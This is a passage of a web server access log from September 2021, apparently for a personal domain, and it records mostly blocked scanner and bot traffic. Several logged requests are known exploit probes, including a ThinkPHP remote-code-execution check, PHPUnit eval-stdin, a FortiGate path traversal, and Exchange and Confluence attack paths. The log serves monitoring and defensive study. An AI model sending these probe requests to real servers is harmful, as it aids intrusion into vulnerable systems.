Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:34 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [18/Sep/2021:10:22:35 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:42:12 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 34.96.130.25] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [18/Sep/2021:10:47:47 +0000] 444 - POST https docs.moralanimal.net "/pages/createpage-entervariables.action?SpaceKey=x" [Client 5.189.184.39] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1" "-" [18/Sep/2021:11:02:59 +0000] 400 - GET http 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 654] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [18/Sep/2021:12:25:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.217.230] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Sep/2021:12:27:28 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Sep/2021:13:07:07 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Sep/2021:13:53:25 +0000] 400 - GET http localhost "/" [Client 8.129.121.0] [Length 154] [Gzip -] "-" "-" [18/Sep/2021:14:15:29 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 39.96.139.120] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [18/Sep/2021:14:16:06 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 39.96.139.120] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [18/Sep/2021:14:16:48 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 39.96.139.120] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [18/Sep/2021:14:17:09 +0000] 444 - GET https 64.22.31.253 "/dns-query?dns=KhUBAAABAAAAAAAAA3d3dwZnb29nbGUDY29tAAABAAE" [Client 39.96.139.120] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [18/Sep/2021:14:24:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.195] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:14:25:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.195] [Length 252] [Gzip -] "-" "-" [18/Sep/2021:14:25:00 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.195] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [18/Sep/2021:17:02:11 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Sep/2021:17:02:11 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Sep/2021:17:02:11 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Sep/2021:17:02:11 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Sep/2021:17:02:11 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Sep/2021:17:02:11 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [18/Sep/2021:17:57:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.7] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Sep/2021:17:57:47 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.7] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Sep/2021:17:57:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 82.221.105.7] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [18/Sep/2021:17:58:04 +0000] 400 - - https localhost "-" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:17:58:04 +0000] 400 - - https localhost "-" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:17:58:05 +0000] 400 - - https localhost "-" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:17:58:14 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:17:58:14 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:17:58:15 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 82.221.105.7] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:17:58:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.107.251] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [18/Sep/2021:19:00:48 +0000] 444 - GET https help.moralanimal.net "/" [Client 92.118.160.37] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [18/Sep/2021:20:20:32 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [18/Sep/2021:21:37:06 +0000] 400 - - http localhost "-" [Client 91.241.19.157] [Length 154] [Gzip -] "-" "-" [18/Sep/2021:21:45:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Sep/2021:23:44:11 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.208.96] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:00:13:29 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.213.28] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:00:13:35 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.196.216] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:00:14:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.221.231] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:00:18:11 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:11 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:13 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:15 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:15 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [19/Sep/2021:00:18:17 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:19 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:20 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:21 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:23 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:00:18:23 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Sep/2021:01:17:38 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Sep/2021:02:01:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.2] [Length 0] [Gzip -] "-" "-" [19/Sep/2021:02:50:10 +0000] 444 - GET https 64.22.31.253 "///remote/fgt_lang?lang=/../../../..//////////dev/" [Client 91.132.58.33] [Length 0] [Gzip -] "python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.36.2.el7.x86_64" "-" [19/Sep/2021:03:29:46 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.211.204] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:05:48:50 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" "-" [19/Sep/2021:05:48:50 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16" "-" [19/Sep/2021:05:48:50 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [19/Sep/2021:06:55:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Sep/2021:08:02:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.216.7] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:09:10:59 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Sep/2021:12:28:04 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.133] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:13:09:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Sep/2021:13:58:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Sep/2021:14:49:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Sep/2021:15:43:32 +0000] 444 - GET https 64.22.31.253 "/_asterisk/" [Client 77.247.108.81] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [19/Sep/2021:15:48:50 +0000] 400 - GET http 64.22.31.253 "/admin/config.php" [Client 77.247.108.81] [Length 252] [Gzip -] "python-requests/2.26.0" "-" [19/Sep/2021:16:13:27 +0000] 400 - GET http localhost "/" [Client 67.205.166.194] [Length 252] [Gzip -] "-" "-" [19/Sep/2021:16:45:11 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 192.168.1.1] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14150.23.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.38 Safari/537.36" "https://launch.moralanimal.net/" [19/Sep/2021:16:45:12 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 192.168.1.1] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14150.23.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.38 Safari/537.36" "https://launch.moralanimal.net/" [19/Sep/2021:16:45:18 +0000] 444 - GET https trilium.moralanimal.net "/" [Client 192.168.1.1] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14150.23.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.38 Safari/537.36" "https://launch.moralanimal.net/" [19/Sep/2021:16:47:06 +0000] 444 - GET https agent.moralanimal.net "/" [Client 192.168.1.1] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14150.23.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.38 Safari/537.36" "https://launch.moralanimal.net/" [19/Sep/2021:16:47:07 +0000] 444 - GET https agent.moralanimal.net "/" [Client 192.168.1.1] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14150.23.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.38 Safari/537.36" "https://launch.moralanimal.net/" [19/Sep/2021:16:47:12 +0000] 444 - GET https agent.moralanimal.net "/" [Client 192.168.1.1] [Length 0] [Gzip -] "Mozilla/5.0 (X11; CrOS x86_64 14150.23.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.38 Safari/537.36" "https://launch.moralanimal.net/" [19/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Sep/2021:17:02:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [19/Sep/2021:18:36:28 +0000] 400 - - http localhost "-" [Client 191.96.168.191] [Length 154] [Gzip -] "-" "-" [19/Sep/2021:19:09:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Sep/2021:20:56:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 178.128.95.247] [Length 0] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1" "-" [19/Sep/2021:21:15:53 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.220.159] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:22:01:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.171.125] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [19/Sep/2021:22:01:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.171.125] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [19/Sep/2021:22:01:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.171.125] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [19/Sep/2021:22:01:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.171.125] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [19/Sep/2021:22:11:30 +0000] 400 - - http localhost "-" [Client 43.129.171.125] [Length 154] [Gzip -] "-" "-" [19/Sep/2021:22:16:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Sep/2021:22:27:42 +0000] 400 - - http localhost "-" [Client 194.61.24.78] [Length 154] [Gzip -] "-" "-" [19/Sep/2021:23:05:17 +0000] 400 - GET http 64.22.31.253 "/" [Client 193.31.24.154] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [19/Sep/2021:23:10:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [19/Sep/2021:23:19:27 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:23:29:00 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Sep/2021:23:46:10 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.215.162] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Sep/2021:23:55:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.168.143] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [20/Sep/2021:00:00:22 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:23 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:23 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:24 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:28 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:29 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:29 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:30 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [20/Sep/2021:00:00:31 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:00:33 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Sep/2021:00:15:03 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.196.216] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:00:17:07 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 198.199.112.66] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:00:17:33 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.50] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:00:18:53 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [20/Sep/2021:00:18:54 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [20/Sep/2021:00:19:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [20/Sep/2021:00:50:47 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 107.189.31.252] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [20/Sep/2021:00:51:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Sep/2021:01:14:18 +0000] 400 - GET http 64.22.31.253 "/" [Client 192.241.207.130] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Sep/2021:01:51:09 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.62.185] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" 